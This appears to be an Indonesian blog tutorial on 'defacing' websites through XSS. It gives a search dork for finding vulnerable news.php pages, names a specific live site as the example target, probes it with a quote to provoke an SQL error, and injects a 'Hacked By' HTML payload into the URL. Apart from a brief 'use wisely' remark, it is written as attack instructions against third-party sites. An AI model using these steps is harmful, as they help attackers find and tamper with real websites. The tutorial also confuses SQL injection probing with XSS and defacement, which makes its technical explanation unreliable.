Cara Deface Website Dengan Methode XSS || EXPLOIT

Deface Metode XSS atau disebut juga Cross Site Scripting Attack adalah metode dimana client memasukan script HTML kedalam sebuah website.

Berikut tutorial Deface Metode XSS :

1.) Dorking, Dork :
inurl:news.php?id= ( kembangkan )
2.) Pilih lah salah satu situs atau website.

Contohnya saya menggunakan situs :

http://iagcc.com/news.php?id=58

 3.)  Cobalah masukan ' dibelakang url contohnya :
http://iagcc.com/news.php?id=58'
Jika blank ataupun muncul sql bla bla berarti vuln contohnya situs yang saya gunakan ini muncul :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
4.) Selanjutnya coba masukan script HTML dibelakang url contohnya :
http://iagcc.com/news.php?id=58%27<h1>Hacked By Indonesian Security</h1>
Tips! : Kalian juga bisa mengubahnya dengan script HTML lainnya.

Nah setelah seperti itu akan muncul seperti gambar dibawah ini berarti kita berhasil mendeface situs tersebut dengan metode xss ini.

Gunakanlah dengan bijak jangan sampai merugikan orang lain.

Sekian tutorial tentang Deface Metode XSS sampai jumpa di tutorial menarik lainnya.